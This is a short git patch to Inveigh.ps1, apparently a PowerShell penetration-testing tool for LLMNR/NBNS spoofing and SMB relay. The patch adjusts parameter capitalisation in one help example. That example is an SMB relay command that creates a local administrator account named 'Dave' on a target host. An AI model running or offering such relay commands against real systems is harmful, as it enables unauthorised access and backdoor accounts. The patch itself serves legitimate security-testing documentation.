From 9c0996fee2ee6364fa13c5865f712fdcd3f6d020 Mon Sep 17 00:00:00 2001 From: Kevin Robertson Date: Tue, 6 Oct 2015 20:56:05 -0400 Subject: Switched to module format Inveigh should now be executed as a module rather than a standalone script. There are multiple cmdlets for interacting with Inveigh. Also fixed a file encoding issue that was causing problems with IEX. --- Inveigh.ps1 | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Inveigh.ps1 b/Inveigh.ps1 index 2bab315..9f05e74 100644 --- a/Inveigh.ps1 +++ b/Inveigh.ps1 @@ -106,7 +106,7 @@ Invoke-Inveigh -IP 192.168.1.10 -SpooferIP 192.168.2.50 -HTTP N Execute specifying a specific local listening IP and a LLMNR/NBNS spoofing IP on another subnet. This may be useful for sending traffic to a controlled Linux system on another subnet. .EXAMPLE -Invoke-Inveigh -smbrelay y -smbrelaytarget 192.168.2.55 -smbrelaycommand "net user Dave Summer2015 /add && net localgroup administrators Dave /add" +Invoke-Inveigh -SMBRelay y -SMBRelayTarget 192.168.2.55 -SMBRelayCommand "net user Dave Summer2015 /add && net localgroup administrators Dave /add" Execute with SMB relay enabled with a command that will create a local administrator account on the SMB relay target. .EXAMPLE -- cgit v1.2.3